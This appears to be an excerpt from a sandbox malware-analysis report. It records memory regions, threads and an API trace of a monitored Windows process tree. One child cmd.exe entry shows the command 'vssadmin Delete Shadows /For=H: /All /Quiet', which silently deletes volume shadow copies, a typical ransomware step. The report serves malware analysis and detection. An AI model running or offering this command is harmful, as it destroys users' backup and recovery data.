	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 4779
	        start_va = 0x4880000
	          end_va = 0x4a0ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 4780
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 4789
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 4790
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 4791
	        start_va = 0x7f120000
	          end_va = 0x7f21ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f120000"
	        filename = ""

Region:
	              id = 4813
	        start_va = 0x100000
	          end_va = 0x1bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 4814
	        start_va = 0x790000
	          end_va = 0x793fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000790000"
	        filename = ""

Region:
	              id = 4815
	        start_va = 0x76630000
	          end_va = 0x766aafff
	       monitored = 0
	     entry_point = 0x7664e970
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")

Region:
	              id = 4816
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 4817
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 4818
	        start_va = 0x400000
	          end_va = 0x43ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 4819
	        start_va = 0x5f0000
	          end_va = 0x5fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005f0000"
	        filename = ""

Region:
	              id = 4820
	        start_va = 0x75f10000
	          end_va = 0x75f53fff
	       monitored = 0
	     entry_point = 0x75f29d80
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 4821
	        start_va = 0x75ba0000
	          end_va = 0x75c4cfff
	       monitored = 0
	     entry_point = 0x75bb4f00
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 4822
	        start_va = 0x73d70000
	          end_va = 0x73d8dfff
	       monitored = 0
	     entry_point = 0x73d7b640
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 4823
	        start_va = 0x73d60000
	          end_va = 0x73d69fff
	       monitored = 0
	     entry_point = 0x73d62a00
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 4824
	        start_va = 0x73e10000
	          end_va = 0x73e67fff
	       monitored = 0
	     entry_point = 0x73e525c0
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 4825
	        start_va = 0x76950000
	          end_va = 0x76a96fff
	       monitored = 0
	     entry_point = 0x76961cf0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 4826
	        start_va = 0x75dc0000
	          end_va = 0x75f0efff
	       monitored = 0
	     entry_point = 0x75e76820
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 4827
	        start_va = 0x76cf0000
	          end_va = 0x76d81fff
	       monitored = 0
	     entry_point = 0x76d28cf0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 4828
	        start_va = 0x6f9d0000
	          end_va = 0x6f9e7fff
	       monitored = 0
	     entry_point = 0x6f9d4820
	     region_type = mapped_file
	            name = "atl.dll"
	        filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll")

Region:
	              id = 4829
	        start_va = 0x6f9b0000
	          end_va = 0x6f9c0fff
	       monitored = 0
	     entry_point = 0x6f9b4670
	     region_type = mapped_file
	            name = "vsstrace.dll"
	        filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll")

Region:
	              id = 4830
	        start_va = 0x73ed0000
	          end_va = 0x7408cfff
	       monitored = 0
	     entry_point = 0x73fb2a10
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

Region:
	              id = 4831
	        start_va = 0x766b0000
	          end_va = 0x766f4fff
	       monitored = 0
	     entry_point = 0x766cde90
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")

Region:
	              id = 4832
	        start_va = 0x6f890000
	          end_va = 0x6f9aafff
	       monitored = 0
	     entry_point = 0x6f8d0930
	     region_type = mapped_file
	            name = "vssapi.dll"
	        filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll")

Region:
	              id = 4833
	        start_va = 0x76aa0000
	          end_va = 0x76afefff
	       monitored = 0
	     entry_point = 0x76aa4af0
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 4834
	        start_va = 0x4a10000
	          end_va = 0x4b1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004a10000"
	        filename = ""

Region:
	              id = 4835
	        start_va = 0x440000
	          end_va = 0x5c7fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000440000"
	        filename = ""

Region:
	              id = 4836
	        start_va = 0x7a0000
	          end_va = 0x7c9fff
	       monitored = 0
	     entry_point = 0x7a5680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 4837
	        start_va = 0x75b70000
	          end_va = 0x75b9afff
	       monitored = 0
	     entry_point = 0x75b75680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 4838
	        start_va = 0x600000
	          end_va = 0x780fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000600000"
	        filename = ""

Region:
	              id = 4839
	        start_va = 0x7a0000
	          end_va = 0x7acfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vssadmin.exe.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vssadmin.exe.mui")

Region:
	              id = 4840
	        start_va = 0x4b20000
	          end_va = 0x5f1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004b20000"
	        filename = ""

Region:
	              id = 4841
	        start_va = 0x20000
	          end_va = 0x20fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 4842
	        start_va = 0x5d0000
	          end_va = 0x5d0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005d0000"
	        filename = ""

Region:
	              id = 4843
	        start_va = 0x7b0000
	          end_va = 0x7b3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000007b0000"
	        filename = ""

Region:
	              id = 4851
	        start_va = 0x4a10000
	          end_va = 0x4af9fff
	       monitored = 0
	     entry_point = 0x4a4d650
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 4852
	        start_va = 0x4b10000
	          end_va = 0x4b1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004b10000"
	        filename = ""

Region:
	              id = 4862
	        start_va = 0x764a0000
	          end_va = 0x764abfff
	       monitored = 0
	     entry_point = 0x764a3930
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")

Region:
	              id = 5087
	        start_va = 0x7c0000
	          end_va = 0x7c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007c0000"
	        filename = ""

Region:
	              id = 5088
	        start_va = 0x76700000
	          end_va = 0x76783fff
	       monitored = 0
	     entry_point = 0x76726220
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")

Region:
	              id = 5089
	        start_va = 0x7d0000
	          end_va = 0x7d0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 5209
	        start_va = 0x7e0000
	          end_va = 0x81ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000007e0000"
	        filename = ""

Region:
	              id = 5210
	        start_va = 0x820000
	          end_va = 0x85ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000820000"
	        filename = ""

Region:
	              id = 5236
	        start_va = 0x4880000
	          end_va = 0x48bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 5237
	        start_va = 0x48c0000
	          end_va = 0x48fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048c0000"
	        filename = ""

Region:
	              id = 5238
	        start_va = 0x4910000
	          end_va = 0x4a0ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004910000"
	        filename = ""

Region:
	              id = 5239
	        start_va = 0x4a10000
	          end_va = 0x4a4ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004a10000"
	        filename = ""

Region:
	              id = 5240
	        start_va = 0x4a50000
	          end_va = 0x4a8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004a50000"
	        filename = ""

Region:
	              id = 5280
	        start_va = 0x5f20000
	          end_va = 0x5ffffff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "kernelbase.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")

Region:
	              id = 5281
	        start_va = 0x4a90000
	          end_va = 0x4b0ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004a90000"
	        filename = ""

Region:
	              id = 5282
	        start_va = 0x4900000
	          end_va = 0x4908fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vsstrace.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vsstrace.dll.mui")


Thread:
	id = 353
	os_tid = 0xd10


Thread:
	id = 356
	os_tid = 0x1e0


Thread:
	id = 382
	os_tid = 0xcd0


Thread:
	id = 385
	os_tid = 0x8c0


Thread:
	id = 386
	os_tid = 0xc90


Process:
	id = "65"
	image_name = "cmd.exe"
	filename = "c:\\windows\\syswow64\\cmd.exe"
	page_root = "0x656d8000"
	os_pid = "0x62c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x117c"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin Delete Shadows /For=H: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 4883
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 4884
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 4885
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 4886
	        start_va = 0x90000
	          end_va = 0x91fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 4887
	        start_va = 0xa0000
	          end_va = 0x19ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000a0000"
	        filename = ""

Region:
	              id = 4888
	        start_va = 0x1a0000
	          end_va = 0x1a3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 4889
	        start_va = 0x1b0000
	          end_va = 0x1b0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001b0000"
	        filename = ""

Region:
	              id = 4890
	        start_va = 0x1c0000
	          end_va = 0x1c1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 4891
	        start_va = 0x2f0000
	          end_va = 0x341fff
	       monitored = 1
	     entry_point = 0x304fd0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")

Region:
	              id = 4892
	        start_va = 0x350000
	          end_va = 0x434ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000350000"
	        filename = ""

Region:
	              id = 4893
	        start_va = 0x4400000
	          end_va = 0x45fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004400000"
	        filename = ""

Region:
	              id = 4894
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 4895
	        start_va = 0x7e940000
	          end_va = 0x7e962fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007e940000"
	        filename = ""

Region:
	              id = 4896
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 4897
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 4898
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 4899
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 4900
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 4901
	        start_va = 0x1d0000
	          end_va = 0x24ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001d0000"
	        filename = ""

Region:
	              id = 4902
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 4903
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 4904
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 4905
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 4906
	        start_va = 0x4600000
	          end_va = 0x46fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 4907
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 4908
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 4909
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 4910
	        start_va = 0x7e840000
	          end_va = 0x7e93ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007e840000"
	        filename = ""

Region:
	              id = 5071
	        start_va = 0x4700000
	          end_va = 0x47bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 5072
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 5073
	        start_va = 0x1d0000
	          end_va = 0x20ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001d0000"
	        filename = ""

Region:
	              id = 5074
	        start_va = 0x240000
	          end_va = 0x24ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000240000"
	        filename = ""

Region:
	              id = 5075
	        start_va = 0x47c0000
	          end_va = 0x48bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000047c0000"
	        filename = ""

Region:
	              id = 5076
	        start_va = 0x250000
	          end_va = 0x2bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000250000"
	        filename = ""

Region:
	              id = 5077
	        start_va = 0x90000
	          end_va = 0x93fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 5084
	        start_va = 0x210000
	          end_va = 0x213fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000210000"
	        filename = ""

Region:
	              id = 5114
	        start_va = 0x48c0000
	          end_va = 0x4bf6fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")


Thread:
	id = 362
	os_tid = 0xad0

	[0304.177] GetProcAddress (hModule=0x76d90000, lpProcName="SetConsoleInputExeNameW") returned 0x746ab440
	[0304.178] GetProcessHeap () returned 0x4600000
	[0304.178] RtlAllocateHeap (HeapHandle=0x4600000, Flags=0x8, Size=0x400a) returned 0x460c400
	[0304.178] GetProcessHeap () returned 0x4600000
	[0304.179] RtlFreeHeap (HeapHandle=0x4600000, Flags=0x0, BaseAddress=0x460c400) returned 1
	[0304.181] _wcsicmp (_String1="vssadmin", _String2=")") returned 77
	[0304.181] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16
	[0304.181] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16
	[0304.181] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13
	[0304.181] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13
	[0304.181] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4
	[0304.182] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4
	[0304.182] GetProcessHeap () returned 0x4600000
	[0304.182] RtlAllocateHeap (HeapHandle=0x4600000, Flags=0x8, Size=0x58) returned 0x4609000
	[0304.182] GetProcessHeap () returned 0x4600000
	[0304.182] RtlAllocateHeap (HeapHandle=0x4600000, Flags=0x8, Size=0x1a) returned 0x4600578
	[0304.184] GetProcessHeap () returned 0x4600000
	[0304.184] RtlAllocateHeap (HeapHandle=0x4600000, Flags=0x8, Size=0x52) returned 0x4609060
	[0304.187] GetConsoleTitleW (in: lpConsoleTitle=0x19f858, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0304.374] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0304.374] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0304.374] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0304.374] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0304.374] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0304.374] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0304.374] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0304.374] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0304.375] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0304.375] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0304.375] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0304.375] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0304.375] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0304.375] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0304.375] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0304.375] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0304.375] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0304.375] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0304.375] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0304.375] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0304.375] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0304.375] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0304.376] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0304.376] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0304.376] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0304.376] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0304.376] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0304.376] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0304.376] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0304.376] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0304.376] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0304.376] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0304.376] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0304.376] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0304.377] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0304.377] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0304.377] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0304.377] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0304.377] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0304.377] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0304.377] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0304.377] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0304.377] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0304.377] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0304.377] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0304.377] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0304.377] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0304.377] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0304.377] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0304.378] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0304.378] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0304.378] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0304.378] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0304.378] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0304.378] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0304.378] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0304.378] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0304.378] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0304.378] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0304.378] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0304.378] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0304.378] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0304.378] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0304.378] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0304.379] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0304.379] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0304.379] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0304.379] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0304.379] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
